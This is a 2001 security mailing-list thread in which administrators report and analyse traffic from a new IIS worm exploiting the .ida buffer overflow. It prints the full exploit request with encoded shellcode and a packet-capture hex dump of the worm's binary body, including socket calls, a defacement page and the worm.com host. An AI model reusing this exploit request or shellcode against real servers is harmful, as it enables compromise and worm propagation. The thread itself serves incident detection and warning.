Re(2): Strange web traffic

From: Ken Eichman (keichmanat_private)
Date: Tue Jul 17 2001 - 12:49:28 PDT

  • Next message: Mike Batchelor: "DNS poisoning of naive caches, bigred.com search engine"

    Scott, Check out Richard Bejtlich's posting to this list from Sunday.
    For your convenience I'm including it here.  Looks like the new IIS
    worm.  I've been tracking it on my IDS and reporting it since Sunday
    07/15.  After I figured out what to look for I went back through my
    logs and found the first worm hit (http scan traffic) at 08:54:30 EDT
    on 07/13 from 202.192.168.145, followed within 15 minutes by
    additional scans from 210.77.157.171, 202.204.193.2 and 210.68.172.1.
    
    So far (as of about 8 hours ago) I logged the http scan from 8122
    unique - assumedly compromised - hosts since the first hit on 07/13.
    In the absence of any advisories about this activity many admins are
    increduluous when I when I report it to them. But I have received
    response from a number of sites (20-30) confirming the IIS compromise.
    
    Regards
    Ken
    
    Ken Eichman                  Senior Security Engineer
    Chemical Abstracts Service   Tel:   (614) 447-3838 ext 3230
    2540 Olentangy River Road    Fax:   (614) 447-3855
    Columbus, OH 43210           Email: keichmanat_private
    
    =======================================================================
    Forwarded mail follows:
    Date: Sun, 15 Jul 2001 16:25:42 -0500
    From: Richard Bejtlich <richardat_private>
    Reply-To: richardat_private
    Organization: TaoSecurity.com
    Subject: IIS .ida exploit involving worm.com / 181.com / 216.99.52.100
    
    Friends in the security world,
    
    I have recently observed multiple exploit attempts related to the
    "Microsoft Index Server and Indexing Service ISAPI Extension Buffer
    Overflow Vulnerability" described here:
    
    http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D2880
    
    It looks like successful execution of an exploit in the wild may result
    in the compromised machine making a connection to www.worm.com to report
    its status (216.99.52.100, also aliased as 181.com and chinga.com; note
    chinga.com also has an address of 209.81.7.23).  Below is the signature
    of the exploit.  I edited sections marked XXcensoredXX to preserve my
    privacy:
    
    GET
    /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
      HTTP/1.0
    Content-type: text/xml
    HOST:www.worm.com
      Accept: */*
    Content-length: 3569
    
    USVWp
    hdGd=o
    `hXw
    pXXXxu
    XX3f=MZXQ<X3fPEyXB<XTxXTTHXLL:KERN3LxEL32 X4TXB
    LHHHLLTH;HLX<GetPLX|rocAHHXTH$3f
    LTQLLLLLLLXTH
    LLXp
    Gdpu8LLLhhu!hP;CKCK4*hQ4Rp;CKCKLhhhthhShhMlLhE[SScxMQPPu&jLPhQUBPl;CKCKPd}\PPPifPtEPH,RjLPQjj;CKCK;CKCKLLLLtghm;CKCKL4LLHhPPPh9PsP:LMTHuPLAHRjh@P;CKCKLLLL0}VL;u>L`hQ%;CKCKLLRHPh@Q;CKCKjhjjjhhcP;CKCK00tth;CKCK8R;CKCK>LLLLG:8P;CKCK>LLLL|th;CKCKjd;CKCKjjj;CKCKxf|f~P[j|QxR;CKCKLLLL}7h;CKCKjjQxR;CKCKh;CKCKDPPPiYPitPti3SkttPPtPut
    tjd;CKCKjjj;CKCKxf|f~Ptj|RxP;CKCKjjhQxR;CKCKLEHhdddLLdtjLPMQhRxP;CKCKjjhQxR;CKCKLEHddddLLdtjLPMQdRxP;CKCKLhdddLLdtjLPhQxR;CKCKEHpLjLREHxQxR;CKCKjhPxQ;CKCKLxR;CKCK0XUWSVPj<Vhpt$(XPt$PX^[_]
    {xV4xV4xV4xV4xV4XPhGD$BE3LoadLibraryAGetSystemTimeCreateThreadCreateFileASleepGetSystemDefaultLangIDVirtualProtectinfocomm.dllTcpSockSendWS2_32.dllsocketconnectsendrecvclosesocketw3svc.dllGET
    ?  HTTP/1.0
    Content-type: text/xml
    HOST:www.worm.com
      Accept: */*
    Content-length: 3569
    
    c:\notwormLMTH
    <html><head><meta http-equiv="Content-Type" content="text/html;
    charset=english"><title>HELLO!</title></head><bady><hr size=5><font
    color="red"><p align="center">Welcome to http://www.worm.com
    !<br><br>Hacked By Chinese!</font></hr></bady></html> HTTP/1.0 200
    Pragma: no-cache
    Cache-Control: no-cache
    Content-Type: text/html
    Content-Length: 90
    
    <TITLE>Error</TITLE>
    <BODY>
    <H1>Error</H1>
    XXcensoredXX: Unknown WWW server.</BODY>
    
    -----
    
    Curious about www.worm.com, I connected to port 80 on the box and found
    this:
    
    telnet www.worm.com 80
    Trying 216.99.52.100...
    Connected to chinga.com (216.99.52.100).
    Escape character is '^]'.
    
    
    <HTML>
    <HEAD>
    <META HTTP-EQUIV="REFRESH" CONTENT="0.01;
    URL=http://www.goto.com/d/home/p/nettcorp/lander/srchindex.jhtml">
    <TITLE> Nett Corp </TITLE>
    </HEAD>
    <blockquote><!-- dlogphp activated, unique hit site is 181.com.  IP is
    XXcensored, but it was my IP addressXX.  Broswer is -->
    </blockquote>
    </BODY>
    </HTML>
    Connection closed by foreign host.
    
    -----
    
    You can see in the 'dlogphp activated' section that my IP address
    appears to have been logged.  (I removed the actual IP address.)
    
    I suggest that readers check their logs for connections to 216.99.52.100
    (www.worm.com), as outbound connections MAY indicate a compromised host.
      I am not a Windows expert and cannot validate the exploit as recorded
    in my logs, but I believe you may find this warning useful.
    
    Sincerely,
    
    Richard Bejtlich
    http://bejtlich.net
    
    =======================================================
    
    ================ Your original message: ===============
    Date: Tue, 17 Jul 2001 19:37:57 +0100
    From: Scott Nursten <scott.nurstenat_private>
    MIME-Version: 1.0
    To: incidentsat_private
    Subject: Re: Strange web traffic
    
    Sorry guys, on my way home, trying to rush out the door .... but before I go, I noticed this - I overlooked it earlier as I'm in quite a hurry. Having analysed it a bit better now (and actually getting a single stream as opposed to several thousand), you see this:
    
    9:15:37.873583 217.86.214.81.4037 > 194.130.109.164.80: S [tcp sum ok] 3804761538:3804761538(0) win 8760 <mss 1460,nop,nop,sackOK> (DF) (ttl 116, id 49118, len 48)
    0x0000   4500 0030 bfde 4000 7406 671a d956 d651        E..0..@.t.g..V.Q
    0x0010   c282 6da4 0fc5 0050 e2c8 0dc2 0000 0000        ..m....P........
    0x0020   7002 2238 8078 0000 0204 05b4 0101 0402        p."8.x..........
    
    19:15:37.873625 194.130.109.164.80 > 217.86.214.81.4037: S [tcp sum ok] 79900976:79900976(0) ack 3804761539 win 5840 <mss 1460,nop,nop,sackOK> (DF) (ttl 64, id 0, len 48)
    0x0000   4500 0030 0000 4000 4006 5af9 c282 6da4        E..0..@.@.Z...m.
    0x0010   d956 d651 0050 0fc5 04c3 3130 e2c8 0dc3        .V.Q.P....10....
    0x0020   7012 16d0 55dc 0000 0204 05b4 0101 0402        p...U...........
    
    19:15:38.200238 217.86.214.81.4037 > 194.130.109.164.80: . [tcp sum ok] 1:1(0) ack 1 win 8760 (DF) (ttl 116, id 49162, len 40)
    0x0000   4500 0028 c00a 4000 7406 66f6 d956 d651        E..(..@.t.f..V.Q
    0x0010   c282 6da4 0fc5 0050 e2c8 0dc3 04c3 3131        ..m....P......11
    0x0020   5010 2238 7738 0000 6d78 0000 0003             P."8w8..mx....
    
    19:15:38.202867 217.86.214.81.4037 > 194.130.109.164.80: P [tcp sum ok] 1:5(4) ack 1 win 8760 (DF) (ttl 116, id 49163, len 44)
    0x0000   4500 002c c00b 4000 7406 66f1 d956 d651        E..,..@.t.f..V.Q
    0x0010   c282 6da4 0fc5 0050 e2c8 0dc3 04c3 3131        ..m....P......11
    0x0020   5018 2238 dbc6 0000 4745 5420 6540             P."8....GET.e@
    
    19:15:38.203063 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 1:1(0) ack 5 win 5840 (DF) (ttl 64, id 15641, len 40)
    0x0000   4500 0028 3d19 4000 4006 1de8 c282 6da4        E..(=.@.@.....m.
    0x0010   d956 d651 0050 0fc5 04c3 3131 e2c8 0dc7        .V.Q.P....11....
    0x0020   5010 16d0 829c 0000                            P.......
    
    19:15:38.404751 217.86.214.81.4037 > 194.130.109.164.80: P [tcp sum ok] 5:1465(1460) ack 1 win 8760 (DF) (ttl 116, id 49164, len 1500)
    0x0000   4500 05dc c00c 4000 7406 6140 d956 d651        E.....@.t.a@.V.Q
    0x0010   c282 6da4 0fc5 0050 e2c8 0dc7 04c3 3131        ..m....P......11
    0x0020   5018 2238 73c8 0000 2f64 6566 6175 6c74        P."8s.../default
    0x0030   2e69 6461 3f4e 4e4e 4e4e 4e4e 4e4e 4e4e        .ida?NNNNNNNNNNN
    0x0040   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0050   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0060   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0070   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0080   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0090   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00a0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00b0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00c0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00d0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00e0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00f0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0100   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0110   4e4e 4e4e 4e25 7539 3039 3025 7536 3835        NNNNN%u9090%u685
    0x0120   3825 7563 6264 3325 7537 3830 3125 7539        8%ucbd3%u7801%u9
    0x0130   3039 3025 7536 3835 3825 7563 6264 3325        090%u6858%ucbd3%
    0x0140   7537 3830 3125 7539 3039 3025 7536 3835        u7801%u9090%u685
    0x0150   3825 7563 6264 3325 7537 3830 3125 7539        8%ucbd3%u7801%u9
    0x0160   3039 3025 7539 3039 3025 7538 3139 3025        090%u9090%u8190%
    0x0170   7530 3063 3325 7530 3030 3325 7538 6230        u00c3%u0003%u8b0
    0x0180   3025 7535 3331 6225 7535 3366 6625 7530        0%u531b%u53ff%u0
    0x0190   3037 3825 7530 3030 3025 7530 303d 6120        078%u0000%u00=a.
    0x01a0   2048 5454 502f 312e 300d 0a43 6f6e 7465        .HTTP/1.0..Conte
    0x01b0   6e74 2d74 7970 653a 2074 6578 742f 786d        nt-type:.text/xm
    0x01c0   6c0a 484f 5354 3a77 7777 2e77 6f72 6d2e        l.HOST:www.worm.
    0x01d0   636f 6d0a 2041 6363 6570 743a 202a 2f2a        com..Accept:.*/*
    0x01e0   0a43 6f6e 7465 6e74 2d6c 656e 6774 683a        .Content-length:
    0x01f0   2033 3536 3920 0d0a 0d0a 558b ec81 ec18        .3569.....U.....
    0x0200   0200 0053 5657 8dbd e8fd ffff b986 0000        ...SVW..........
    0x0210   00b8 cccc cccc f3ab c785 70fe ffff 0000        ..........p.....
    0x0220   0000 e90a 0b00 008f 8568 feff ff8d bdf0        .........h......
    0x0230   feff ff64 a100 0000 0089 4708 6489 3d00        ...d......G.d.=.
    0x0240   0000 00e9 6f0a 0000 8f85 60fe ffff c785        ....o.....`.....
    0x0250   f0fe ffff ffff ffff 8b85 68fe ffff 83e8        ..........h.....
    0x0260   0789 85f4 feff ffc7 8558 feff ff00 00e0        .........X......
    0x0270   77e8 9b0a 0000 83bd 70fe ffff 000f 85dd        w.......p.......
    0x0280   0100 008b 8d58 feff ff81 c100 0001 0089        .....X..........
    0x0290   8d58 feff ff81 bd58 feff ff00 0000 7875        .X.....X......xu
    0x02a0   0ac7 8558 feff ff00 00f0 bf8b 9558 feff        ...X.........X..
    0x02b0   ff33 c066 8b02 3d4d 5a00 000f 859a 0100        .3.f..=MZ.......
    0x02c0   008b 8d58 feff ff8b 513c 8b85 58fe ffff        ...X....Q<..X...
    0x02d0   33c9 668b 0c10 81f9 5045 0000 0f85 7901        3.f.....PE....y.
    0x02e0   0000 8b95 58fe ffff 8b42 3c8b 8d58 feff        ....X....B<..X..
    0x02f0   ff8b 5401 7803 9558 feff ff89 9554 feff        ..T.x..X.....T..
    0x0300   ff8b 8554 feff ff8b 480c 038d 58fe ffff        ...T....H...X...
    0x0310   898d 4cfe ffff 8b95 4cfe ffff 813a 4b45        ..L.....L....:KE
    0x0320   524e 0f85 3301 0000 8b85 4cfe ffff 8178        RN..3.....L....x
    0x0330   0445 4c33 320f 8520 0100 008b 8d58 feff        .EL32........X..
    0x0340   ff89 8d34 feff ff8b 9554 feff ff8b 8558        ...4.....T.....X
    0x0350   feff ff03 4220 8985 4cfe ffff c785 48fe        ....B...L.....H.
    0x0360   ffff 0000 0000 eb1e 8b8d 48fe ffff 83c1        ..........H.....
    0x0370   0189 8d48 feff ff8b 954c feff ff83 c204        ...H.....L......
    0x0380   8995 4cfe ffff 8b85 54fe ffff 8b8d 48fe        ..L.....T.....H.
    0x0390   ffff 3b48 180f 8dc0 0000 008b 954c feff        ..;H.........L..
    0x03a0   ff8b 028b 8d58 feff ff81 3c01 4765 7450        .....X....<.GetP
    0x03b0   0f85 a000 0000 8b95 4cfe ffff 8b02 8b8d        ........L.......
    0x03c0   58fe ffff 817c 0104 726f 6341 0f85 8400        X....|..rocA....
    0x03d0   0000 8b95 48fe ffff 0395 48fe ffff 0395        ....H.....H.....
    0x03e0   58fe ffff 8b85 54fe ffff 8b48 2433 c066        X.....T....H$3.f
    0x03f0   8b04 0a89 854c feff ff8b 8d54 feff ff8b        .....L.....T....
    0x0400   5110 8b85 4cfe ffff 8d4c 10ff 898d 4cfe        Q...L....L....L.
    0x0410   ffff 8b95 4cfe ffff 0395 4cfe ffff 0395        ....L.....L.....
    0x0420   4cfe ffff 0395 4cfe ffff 0395 58fe ffff        L.....L.....X...
    0x0430   8b85 54fe ffff 8b48 1c8b 140a 8995 4cfe        ..T....H......L.
    0x0440   ffff 8b85 4cfe ffff 0385 58fe ffff 8985        ....L.....X.....
    0x0450   70fe ffff eb05 e90d ffff ffe9 16fe ffff        p...............
    0x0460   8dbd f0fe ffff 8b47 0864 a300 0000 0083        .......G.d......
    0x0470   bd70 feff ff00 7505 e938 0800 00c7 854c        .p....u..8.....L
    0x0480   feff ff01 0000 00eb 0f8b 8d4c feff ff83        ...........L....
    0x0490   c101 898d 4cfe ffff 8b95 68fe ffff 0fbe        ....L.....h.....
    0x04a0   0285 c00f 848d 0000 008b 8d68 feff ff0f        ...........h....
    0x04b0   be11 83fa 0975 218b 8568 feff ff83 c001        .....u!..h......
    0x04c0   8bf4 50ff 9590 feff ff3b f490 434b 434b        ..P......;..CKCK
    0x04d0   8985 34fe ffff eb2a 8bf4 8b8d 68fe ffff        ..4....*....h...
    0x04e0   518b 9534 feff ff52 ff95 70fe ffff 3bf4        Q..4...R..p...;.
    0x04f0   9043 4b43 4b8b 8d4c feff ff89 848d 8cfe        .CKCK..L........
    0x0500   ffff eb0f 8b95 68fe ffff 83c2 0189 9568        ......h........h
    0x0510   feff ff8b 8568 feff ff0f be08 85c9 7402        .....h........t.
    0x0520   ebe2 8b95 68fe ffff 83c2 0189 9568 feff        ....h........h..
    0x0530   ffe9 53ff ffff 8b85 68fe ffff 83c0 0189        ..S.....h.......
    0x0540   8568 feff ff8b 4d08 8b91 8400 0000 8995        .h....M.........
    0x0550   6cfe ffff c785 4cfe ffff 0400 0000 c685        l.....L.........
    0x0560   d0fe ffff 688b 4508 8985 d1fe ffff c785        ....h.E.........
    0x0570   d5fe ffff 5b53 53ff c785 d9fe ffff 6378        ....[SS.......cx
    0x0580   9090 8b4d 088b 5110 8995 50fe ffff 83bd        ...M..Q...P.....
    0x0590   50fe ffff 0075 268b f46a 008d 854c feff        P....u&..j...L..
    0x05a0   ff50 8b8d 68fe ffff 518b 5508 8b42 0850        .P..h...Q.U..B.P
    0x05b0   ff95 6cfe ffff 3bf4 9043 4b43 4b83 bd50        ..l...;..CKCK..P
    0x05c0   feff ff64 7d5c 8b8d 50fe ffff 83c1 0189        ...d}\..P.......
    0x05d0   8d50 feff ff8b 9550 feff ff69                  .P.....P...i
    
    19:15:38.404825 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 1:1(0) ack 1465 win 8760 (DF) (ttl 64, id 15642, len 40)
    0x0000   4500 0028 3d1a 4000 4006 1de7 c282 6da4        E..(=.@.@.....m.
    0x0010   d956 d651 0050 0fc5 04c3 3131 e2c8 137b        .V.Q.P....11...{
    0x0020   5010 2238 7180 0000                            P."8q...
    
    19:15:38.405121 194.130.109.164.80 > 217.86.214.81.4037: P [tcp sum ok] 1:500(499) ack 1465 win 8760 (DF) (ttl 64, id 15643, len 539)
    0x0000   4500 021b 3d1b 4000 4006 1bf3 c282 6da4        E...=.@.@.....m.
    0x0010   d956 d651 0050 0fc5 04c3 3131 e2c8 137b        .V.Q.P....11...{
    0x0020   5018 2238 4829 0000 4854 5450 2f31 2e31        P."8H)..HTTP/1.1
    0x0030   2034 3030 2042 6164 2052 6571 7565 7374        .400.Bad.Request
    0x0040   0d0a 4461 7465 3a20 5475 652c 2031 3720        ..Date:.Tue,.17.
    0x0050   4a75 6c20 3230 3031 2031 383a 3135 3a33        Jul.2001.18:15:3
    0x0060   3820 474d 540d 0a53 6572 7665 723a 2041        8.GMT..Server:.A
    0x0070   7061 6368 652f 312e 332e 3230 2028 556e        pache/1.3.20.(Un
    0x0080   6978 2920 5048 502f 342e 302e 360d 0a43        ix).PHP/4.0.6..C
    0x0090   6f6e 6e65 6374 696f 6e3a 2063 6c6f 7365        onnection:.close
    0x00a0   0d0a 436f 6e74 656e 742d 5479 7065 3a20        ..Content-Type:.
    0x00b0   7465 7874 2f68 746d 6c3b 2063 6861 7273        text/html;.chars
    0x00c0   6574 3d69 736f 2d38 3835 392d 310d 0a0d        et=iso-8859-1...
    0x00d0   0a3c 2144 4f43 5459 5045 2048 544d 4c20        .<!DOCTYPE.HTML.
    0x00e0   5055 424c 4943 2022 2d2f 2f49 4554 462f        PUBLIC."-//IETF/
    0x00f0   2f44 5444 2048 544d 4c20 322e 302f 2f45        /DTD.HTML.2.0//E
    0x0100   4e22 3e0a 3c48 544d 4c3e 3c48 4541 443e        N">.<HTML><HEAD>
    0x0110   0a3c 5449 544c 453e 3430 3020 4261 6420        .<TITLE>400.Bad.
    0x0120   5265 7175 6573 743c 2f54 4954 4c45 3e0a        Request</TITLE>.
    0x0130   3c2f 4845 4144 3e3c 424f 4459 3e0a 3c48        </HEAD><BODY>.<H
    0x0140   313e 4261 6420 5265 7175 6573 743c 2f48        1>Bad.Request</H
    0x0150   313e 0a59 6f75 7220 6272 6f77 7365 7220        1>.Your.browser.
    0x0160   7365 6e74 2061 2072 6571 7565 7374 2074        sent.a.request.t
    0x0170   6861 7420 7468 6973 2073 6572 7665 7220        hat.this.server.
    0x0180   636f 756c 6420 6e6f 7420 756e 6465 7273        could.not.unders
    0x0190   7461 6e64 2e3c 503e 0a43 6c69 656e 7420        tand.<P>.Client.
    0x01a0   7365 6e74 206d 616c 666f 726d 6564 2048        sent.malformed.H
    0x01b0   6f73 7420 6865 6164 6572 3c50 3e0a 3c48        ost.header<P>.<H
    0x01c0   523e 0a3c 4144 4452 4553 533e 4170 6163        R>.<ADDRESS>Apac
    0x01d0   6865 2f31 2e33 2e32 3020 5365 7276 6572        he/1.3.20.Server
    0x01e0   2061 7420 7469 7461 6e69 612e 696e 6672        .at.titania.infr
    0x01f0   6f6e 742e 636f 2e75 6b20 506f 7274 2038        ont.co.uk.Port.8
    0x0200   303c 2f41 4444 5245 5353 3e0a 3c2f 424f        0</ADDRESS>.</BO
    0x0210   4459 3e3c 2f48 544d 4c3e 0a                    DY></HTML>.
    
    19:15:38.405193 194.130.109.164.80 > 217.86.214.81.4037: F [tcp sum ok] 500:500(0) ack 1465 win 8760 (DF) (ttl 64, id 15644, len 40)
    0x0000   4500 0028 3d1c 4000 4006 1de5 c282 6da4        E..(=.@.@.....m.
    0x0010   d956 d651 0050 0fc5 04c3 3324 e2c8 137b        .V.Q.P....3$...{
    0x0020   5011 2238 6f8c 0000                            P."8o...
    
    19:15:38.950063 217.86.214.81.4037 > 194.130.109.164.80: . [tcp sum ok] 1465:2925(1460) ack 1 win 8760 (DF) (ttl 116, id 49212, len 1500)
    0x0000   4500 05dc c03c 4000 7406 6110 d956 d651        E....<@.t.a..V.Q
    0x0010   c282 6da4 0fc5 0050 e2c8 137b 04c3 3131        ..m....P...{..11
    0x0020   5010 2238 e9b2 0000 d28d 66f0 5089 9574        P."8......f.P..t
    0x0030   feff ff8b 4508 8b8d 50fe ffff 8948 108b        ....E...P....H..
    0x0040   f48d 952c feff ff52 6a00 8d85 4cfe ffff        ...,...Rj...L...
    0x0050   508d 8dd0 feff ff51 6a00 6a00 ff95 98fe        P......Qj.j.....
    0x0060   ffff 3bf4 9043 4b43 4be9 9f01 0000 8bf4        ..;..CKCK.......
    0x0070   ff95 a4fe ffff 3bf4 9043 4b43 4b89 854c        ......;..CKCK..L
    0x0080   feff ff8b 954c feff ff81 e2ff ff00 0089        .....L..........
    0x0090   954c feff ff81 bd4c feff ff09 0400 0074        .L.....L.......t
    0x00a0   05e9 6701 0000 8bf4 6800 dd6d 00ff 95a0        ..g.....h..m....
    0x00b0   feff ff3b f490 434b 434b e980 0600 008f        ...;..CKCK......
    0x00c0   854c feff ff8b 8534 feff ff89 85cc feff        .L.....4........
    0x00d0   ff8b 8d4c feff ff8b 95b0 feff ff89 118b        ...L............
    0x00e0   854c feff ff8b 8dc8 feff ff89 4804 8b95        .L..........H...
    0x00f0   68fe ffff 8995 50fe ffff eb0f 8b85 50fe        h.....P.......P.
    0x0100   ffff 83c0 0189 8550 feff ff8b 8d68 feff        .......P.....h..
    0x0110   ff81 c100 0100 0039 8d50 feff ff73 128b        .......9.P...s..
    0x0120   9550 feff ff81 3a4c 4d54 4875 02eb 02eb        .P....:LMTHu....
    0x0130   cb8b 8550 feff ff83 c004 8b8d 4cfe ffff        ...P........L...
    0x0140   8941 088b f48d 9548 feff ff52 6a04 6800        .A.....H...Rj.h.
    0x0150   4000 008b 85cc feff ff50 ff95 a8fe ffff        @........P......
    0x0160   3bf4 9043 4b43 4bc7 854c feff ff00 0000        ;..CKCK..L......
    0x0170   00eb 0f8b 8d4c feff ff83 c101 898d 4cfe        .....L........L.
    0x0180   ffff 81bd 4cfe ffff 0030 0000 7d56 8b95        ....L....0..}V..
    0x0190   ccfe ffff 0395 4cfe ffff 8b02 3b85 b0fe        ......L.....;...
    0x01a0   ffff 753e 8b8d ccfe ffff 038d 4cfe ffff        ..u>........L...
    0x01b0   8b95 60fe ffff 8911 8bf4 6800 5125 02ff        ..`.......h.Q%..
    0x01c0   95a0 feff ff3b f490 434b 434b 8b85 ccfe        .....;..CKCK....
    0x01d0   ffff 0385 4cfe ffff 8b8d b0fe ffff 8908        ....L...........
    0x01e0   eb02 eb8f 8bf4 8d95 4cfe ffff 528b 8548        ........L...R..H
    0x01f0   feff ff50 6800 4000 008b 8dcc feff ff51        ...Ph.@........Q
    0x0200   ff95 a8fe ffff 3bf4 9043 4b43 4bba 0100        ......;..CKCK...
    0x0210   0000 85d2 0f84 e704 0000 8bf4 6a00 6880        ............j.h.
    0x0220   0000 006a 036a 006a 0168 0000 0080 8b85        ...j.j.j.h......
    0x0230   68fe ffff 83c0 6350 ff95 9cfe ffff 3bf4        h.....cP......;.
    0x0240   9043 4b43 4b89 8530 feff ff83 bd30 feff        .CKCK..0.....0..
    0x0250   ffff 741f b901 0000 0085 c974 168b f468        ..t........t...h
    0x0260   ffff ff7f ff95 a0fe ffff 3bf4 9043 4b43        ..........;..CKC
    0x0270   4beb e18b f48d 9538 feff ff52 ff95 94fe        K......8...R....
    0x0280   ffff 3bf4 9043 4b43 4b8b 853e feff ff89        ..;..CKCK..>....
    0x0290   854c feff ff8b 8d4c feff ff81 e1ff ff00        .L.....L........
    0x02a0   0089 8d4c feff ff83 bd4c feff ff14 0f8c        ...L.....L......
    0x02b0   4701 0000 ba01 0000 0085 d20f 843a 0100        G............:..
    0x02c0   008b f48d 8538 feff ff50 ff95 94fe ffff        .....8...P......
    0x02d0   3bf4 9043 4b43 4b8b 8d3e feff ff89 8d4c        ;..CKCK..>.....L
    0x02e0   feff ff8b 954c feff ff81 e2ff ff00 0089        .....L..........
    0x02f0   954c feff ff83 bd4c feff ff1c 7c1f b801        .L.....L....|...
    0x0300   0000 0085 c074 168b f468 ffff ff7f ff95        .....t...h......
    0x0310   a0fe ffff 3bf4 9043 4b43 4beb e18b f46a        ....;..CKCK....j
    0x0320   64ff 95a0 feff ff3b f490 434b 434b 8bf4        d......;..CKCK..
    0x0330   6a00 6a01 6a02 ff95 b8fe ffff 3bf4 9043        j.j.j.......;..C
    0x0340   4b43 4b89 8578 feff ff66 c785 7cfe ffff        KCK..x...f..|...
    0x0350   0200 66c7 857e feff ff00 50c7 8580 feff        ..f..~....P.....
    0x0360   ffc6 89f0 5b8b f46a 108d 8d7c feff ff51        ....[..j...|...Q
    0x0370   8b95 78fe ffff 52ff 95bc feff ff3b f490        ..x...R......;..
    0x0380   434b 434b c785 4cfe ffff 0000 0000 eb0f        CKCK..L.........
    0x0390   8b85 4cfe ffff 83c0 0189 854c feff ff81        ..L........L....
    0x03a0   bd4c feff ff00 8001 007d 378b f468 e803        .L.......}7..h..
    0x03b0   0000 ff95 a0fe ffff 3bf4 9043 4b43 4b8b        ........;..CKCK.
    0x03c0   f46a 006a 018d 8dfc feff ff51 8b95 78fe        .j.j.......Q..x.
    0x03d0   ffff 52ff 95c0 feff ff3b f490 434b 434b        ..R......;..CKCK
    0x03e0   ebae 8bf4 6800 0000 01ff 95a0 feff ff3b        ....h..........;
    0x03f0   f490 434b 434b e9b9 feff ff8b 8544 feff        ..CKCK.......D..
    0x0400   ff89 8550 feff ff8b 8d50 feff ff0f af8d        ...P.....P......
    0x0410   50fe ffff 69c9 e359 cd00 8b95 50fe ffff        P...i..Y....P...
    0x0420   69d2 b9e1 0100 8b85 74fe ffff 03c1 03d0        i.......t.......
    0x0430   8995 50fe ffff 8b8d 74fe ffff 69c9 8333        ..P.....t...i..3
    0x0440   cf00 81c1 53fe 6b07 898d 74fe ffff 8b95        ....S.k...t.....
    0x0450   74fe ffff 81e2 ff00 0000 8995 50fe ffff        t...........P...
    0x0460   83bd 50fe ffff 7f74 0c81 bd50 feff ffe0        ..P....t...P....
    0x0470   0000 0075 118b 8574 feff ff05 a90d 0200        ...u...t........
    0x0480   8985 74fe ffff 8bf4 6a64 ff95 a0fe ffff        ..t.....jd......
    0x0490   3bf4 9043 4b43 4b8b f46a 006a 016a 02ff        ;..CKCK..j.j.j..
    0x04a0   95b8 feff ff3b f490 434b 434b 8985 78fe        .....;..CKCK..x.
    0x04b0   ffff 66c7 857c feff ff02 0066 c785 7efe        ..f..|.....f..~.
    0x04c0   ffff 0050 8b8d 74fe ffff 898d 80fe ffff        ...P..t.........
    0x04d0   8bf4 6a10 8d95 7cfe ffff 528b 8578 feff        ..j...|...R..x..
    0x04e0   ff50 ff95 bcfe ffff 3bf4 9043 4b43 4b85        .P......;..CKCK.
    0x04f0   c00f 85ef 0100 008b f46a 006a 048b 8d68        .........j.j...h
    0x0500   feff ff51 8b95 78fe ffff 52ff 95c0 feff        ...Q..x...R.....
    0x0510   ff3b f490 434b 434b c785 4cfe ffff 0000        .;..CKCK..L.....
    0x0520   0000 8b45 088b 4868 898d 64fe ffff eb1e        ...E..Hh..d.....
    0x0530   8b95 64fe ffff 83c2 0189 9564 feff ff8b        ..d........d....
    0x0540   854c feff ff83 c001 8985 4cfe ffff 8b8d        .L........L.....
    0x0550   64fe ffff 0fbe 1185 d274 02eb d38b f46a        d........t.....j
    0x0560   008b 854c feff ff50 8b4d 088b 5168 528b        ...L...P.M..QhR.
    0x0570   8578 feff ff50 ff95 c0fe ffff 3bf4 9043        .x...P......;..C
    0x0580   4b43 4b8b f46a 006a 018b 8d68 feff ff83        KCK..j.j...h....
    0x0590   c105 518b 9578 feff ff52 ff95 c0fe ffff        ..Q..x...R......
    0x05a0   3bf4 9043 4b43 4bc7 854c feff ff00 0000        ;..CKCK..L......
    0x05b0   008b 4508 8b48 6489 8d64 feff ffeb 1e8b        ..E..Hd..d......
    0x05c0   9564 feff ff83 c201 8995 64fe ffff 8b85        .d........d.....
    0x05d0   4cfe ffff 83c0 0189 854c feff                  L........L..
    
    19:15:38.986071 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 501:501(0) ack 2925 win 11680 (DF) (ttl 64, id 15645, len 40)
    0x0000   4500 0028 3d1d 4000 4006 1de4 c282 6da4        E..(=.@.@.....m.
